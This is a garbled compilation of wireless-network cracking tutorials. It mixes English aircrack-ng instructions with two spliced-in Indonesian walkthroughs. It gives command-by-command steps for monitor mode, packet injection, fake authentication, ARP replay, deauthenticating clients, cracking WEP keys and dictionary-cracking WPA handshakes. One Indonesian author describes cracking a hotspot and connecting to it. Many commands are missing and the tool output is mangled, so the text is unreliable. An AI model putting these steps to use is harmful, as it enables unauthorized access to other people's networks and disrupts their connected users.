Step2 Hacking
Step2 Hacking
Step2 Hacking
The purpose of this step is to put your card into what is called monitor mode. Monitor mode is mode whereby your card can listen to every packet in the air. Normally your card will only hear packets addressed to you. By hearing every packet, we can later select some for injection. As well, only (there are some rare exceptions) monitor mode allows you to inject packets. (Note: this procedure is different for non-Atheros cards.) First stop ath0 by entering:
airmon-ng stop ath0
wifi0 ath0
Atheros Atheros
Enter iwconfig to ensure there are no other athX interfaces. It should look similar to this:
lo no wireless extensions.
eth0
no wireless extensions.
wifi0
no wireless extensions.
If there are any remaining athX interfaces, then stop each one. When you are finished, run iwconfig to ensure there are none left. Now, enter the following command to start the wireless card on channel 9 in monitor mode:
airmon-ng start wifi0 9
Substitute the channel number that your AP runs on for 9 in the command above. This is important. You must have your wireless card locked to the AP channel for the following steps in this tutorial to work correctly. Note: In this command we use wifi0 instead of our wireless interface of ath0. This is because the madwifi-ng drivers are being used. For other drivers, use the wireless interface name. Examples: wlan0 or rausb0. The system will respond:
Interface Chipset Driver
Atheros Atheros
You will notice that ath0 is reported above as being put into monitor mode. To confirm the interface is properly setup, enter iwconfig. The system will respond:
lo no wireless extensions.
wifi0
no wireless extensions.
eth0
no wireless extensions.
ath0
ESSID:""
RTS thr:off
Fragment thr:off
Encryption key:off Power Management:off Link Quality=0/94 Rx invalid nwid:0 Signal level=-95 dBm Rx invalid crypt:0 Invalid misc:0 Noise level=-95 dBm
Tx excessive retries:0
In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Please note that only the madwifi-ng drivers show the MAC address of your wireless card, the other drivers do not do this. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly. To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/ Channel.html#wp134132 . This will give you the frequency for each channel.
Enter:
aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0
Where: -9 means injection test -e teddy is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address
ath0 is the wireless interface name The system should respond with:
09:23:35 09:23:35 09:23:35 09:23:37 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 Trying broadcast probe requests... Injection is working! Found 1 AP
Trying directed probe requests... 00:14:6C:7E:40:80 - channel: 9 - 'teddy' Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73 30/30: 100%
The last line is important. Ideally it should say 100% or a very high percentage. If it is low then you are too far away from the AP or too close. If it is zero then injection is not working and you need to patch your drivers or use different drivers. See the injection test for more details.
Where: -c 9 is the channel for the wireless network --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminate extraneous traffic. -w capture is file name prefix for the file which will contain the IVs. ath0 is the interface name. While the injection is taking place (later), the screen will look similar to this:
CH
BSSID
PWR RXQ
Beacons
#Data, #/s
CH
MB
ENC
42 100 STATION
5240
178307 PWR 42
338
54
WEP Probes
WEP
teddy
Lost 0
Packets 183782
00:0F:B5:88:AC:82
Where: -1 means fake authentication 0 reassociation timing in seconds -e teddy is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:0F:B5:88:AC:82 is our card MAC address
Where: 6000 - Reauthenticate every 6000 seconds. The long period also causes keep alive packets to be sent. -o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs. -q 10 - Send keep alive packets every 10 seconds. Success looks like:
18:22:32 18:22:32 18:22:32 18:22:32 18:22:42 18:22:52 Sending Authentication Request Authentication successful Sending Association Request Association successful :-) Sending keep-alive packet Sending keep-alive packet
# and so on.
Notice the Got a deauthentication packet and the continuous retries above. Do not proceed to the next step until you have the fake authentication running correctly.
Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the
MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and Run: tcpdump -n -vvv -s0 -e -i <interface name> | grep -i -E (RA:<MAC address of your card>|Authentication|ssoc) You would then look for error messages. If at any time you wish to confirm you are properly associated is to use
tcpdump and look at the packets. Start another session and Run: tcpdump -n -e -s0 -vvv -i ath0 Here is a typical tcpdump error message you are looking for:
11:04:34.360700 SA:00:14:6c:7e:40:80 station 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 DeAuthentication: Class 3 frame received from nonassociated
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets. If you want to select only the DeAuth packets with tcpdump then you can use: tcpdump -n -e -s0 -vvv -i ath0 | grep -i DeAuth. You may need to tweak the phrase DeAuth to pick out the exact packets you want.
It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says got 0 ARP requests after waiting a long time. Here is what the screen looks like when ARP requests are being injected:
Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The #/s should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second.
Troubleshooting Tips
If you receive a message similar to Got a deauth/disassoc packet. Is the source mac associated?, this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step (Step 3) and successfully associate with the AP.
Where: -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP. output*.cap selects all files starting with output and ending in .cap. To also use the FMS/Korek method, start another console session and enter:
aircrack-ng -K -b 00:14:6C:7E:40:80 output*.cap
Where: -K invokes the FMS/Korek method -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP. output*.cap selects all files starting with output and ending in .cap. If you are using 1.0-rc1, add the option -K for the FMS/KoreK attack. (1.0-rc1 defaults to PTW.) You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are
very approximate and there are many variables as to how many IVs you actually need to crack the WEP key. Here is what success looks like:
Aircrack-ng 0.9
depth 0/ 9 3) F6(
byte(vote) 12( 15) F9( 3) 03( 0) 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5)
0/ 8 34( 61) E8( 13) 89( 12) E4( 12) 0/ 2 56( 87) A6( 10) 17( 10) 27( 10) 1/ 5 78( 43) 1A( 15) 6A( 15) 7C( 15)
27) E0(
24) 06(
18) 3B(
16) 4E(
15) E1(
15)
63) 15(
17) 02(
15) 6B(
15) E0(
15) AB(
13)
20) 9B(
20) 4B(
17) 4A(
16) 2B(
15) 4D(
15)
Menembus Pertahanan WEP Keys: 1. Jalankan BackTrack. #airmon-ng -> cek interface ath yang aktif #airmon-ng stop ath0 #airmon-ng stop ath1 -> bila ath1 aktif 2. Reset driver wireless. Ketikkan:
#airmon-ng start wifi0 3. Buka 3 buah console. 4. Console 1, ketikkan: #airodump-ng ath0 -> scanning hotspot yang aktif. #airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0 Keterangan: Proses ini untuk mengcapture informasi dapat membantu dalam menembus WE P Key. --bssid -> MAC-Address dari AP yang akan di crack -w target -> hasil capture ini akan disimpan di file yang namanya target 5. Console 2, ketikkan: Untuk membantu menciptakan pengumpulan paket data #aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0 Keterangan: -b -> MAC-Address dari AP. -h -> MAC-Address dari client yang aktif terhubung ke AP. 6. Console 3, ketikkan: Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client. #aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0 Keterangan:
-c -> MAC-Address dari Client -a -> MAC-Address dari AP 7. Setelah terkumpul paket data yang cukup, dilakukan cracking: #aircrack-ng target*.cap Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan
Langkah 1, Install Aircrack-ng #sudo apt-get install aircrack-ng Langkah 2, Indentifikasi Device Kita cari tau dulu MAC address device usb kita dan lokasi device tersebut,.. #sudo iwconfig
oke dengan kedua perintah diatas kita sudah dapat mengetahui kalo lokasi device wireless kita berada dieth2 dengan mac 00:02:72:5A:3B:6C kita lanjut ke langkah selanjutnya,.. Langkah 3, Scanning Scanning semua Access Point sasaran untuk mengetahui 3 hal, ssid mukegile, mac 00:18:F8:36:83:23 channel 6 tempat acces point beroprasi, #sudo airmon-ng stop eth2 #sudo iwlist eth2 scanning
Langkah 4, Monitor Mode lanjutkan dengan merubah wifi kita menjadi monitor mode,.. #sudo airmon-ng start eth2 6
Langkah 5, Capturing Package Kerjaan selanjutnya menangkap paket yang keluar dari acces point disimpan sebagai file,.. #sudo airodump-ng -c 6 bssid 00:18:F8:36:83:23 -w output eth2
nah kerjaan ini yang agak lama, tergantung sekali dengan paket yang di broadcast,.. kalo banyak yang pake Access Point itu makin cepet kita bisa crack passwordnya,.. kira2 data yang harus kita kumpulkan untuk cukup
meng-carck 128 bit encryptions yah sekita 80.000 IVs, kalo mau tau berapa IVs yang sudah kita punya,.. teken CTRL-C aja truz lanjutkan ke langkah selanjutnya,.. Langkah 6, Crack #sudo aircrack-ng -z -b 00:18:F8:36:83:23 output*.cap
dari gambar diatas kita bisa liat bahwa IVs yang kita dapat sekitar 81313 IVs,.. dan kita sudah dapat menemukan key atau passwordnya,.. perlu di ingat jika IVs-nya masih belum mencukupi pada saat anda melakukan perintah #aircrack-ng maka anda harus mengulang langkah ke 5 begitu saja berulang-ulang sampai IVs-nya terpenuhi diatas 80.000 IVs,.. jika anda sudah mendapatkan passwordnya tinggal menggunakannya untuk connect atau associates ,.. nah kebetulan pada saat saya coba key-nya,.. ternyata terkoneksi dengan muluz, dan langsung dapet IP,.. ternyata Acces Point Hot Spot tersebut memberikan IP otomatis atau DHCP,.. akhirnya bisa konek dech,..
WPA2
rausb0
Ralink
Where: -c 9 is the channel for the wireless network --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic. -w psk is the file name prefix for the file which will contain the IVs. ath0 is the interface name. Important: Do NOT use the --ivs option. You must capture the full packets. Here what it looks like if a wireless client is connected to the network:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID
PWR RXQ
Beacons
#Data, #/s
CH
MB
ENC
39 100 STATION
51 PWR 35
116 Lost 0
14
54
PSK
teddy
Packets 116
00:0F:B5:FD:FB:C2
In the screen above, notice the WPA handshake: 00:14:6C:7E:40:80 in the top righthand corner. This means airodump-ng has successfully captured the four-way handshake. Here it is with no connected wireless clients:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51
BSSID
PWR RXQ
Beacons
#Data, #/s
CH
MB
ENC
00:14:6C:7E:40:80 BSSID
39 100 STATION
51 PWR
0 Lost
54
PSK
teddy
Packets
Troubleshooting Tip
See the Troubleshooting Tips section below for ideas. To see if you captured any handshake packets, there are two ways. Watch the airodump-ng screen for WPA handshake: 00:14:6C:7E:40:80 in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot. Use Wireshark and apply a filter of eapol. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets.
Where: -0 means deauthentication 1 is the number of deauths to send (you can send multiple if you wish) -a 00:14:6C:7E:40:80 is the MAC address of the access point -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
ath0 is the interface name Here is what the output looks like:
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
With luck this causes the client to reauthenticate and yield the 4-way handshake.
Troubleshooting Tips
The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not hear the deauthentication packet.
Where: -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory. *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files. Here is typical output when there are no handshakes found:
Opening psk-01.cap Opening psk-02.cap Opening psk-03.cap Opening psk-04.cap Read 1827 packets.
When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP. Here is typical output when handshakes are found:
Opening psk-01.cap Opening psk-02.cap Opening psk-03.cap Opening psk-04.cap Read 1827 packets.
BSSID
ESSID
Encryption
00:14:6C:7E:40:80
teddy
WPA (1 handshake)
Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days. Here is what successfully cracking the pre-shared key looks like:
Aircrack-ng 0.8
Master Key
: CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC
: 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB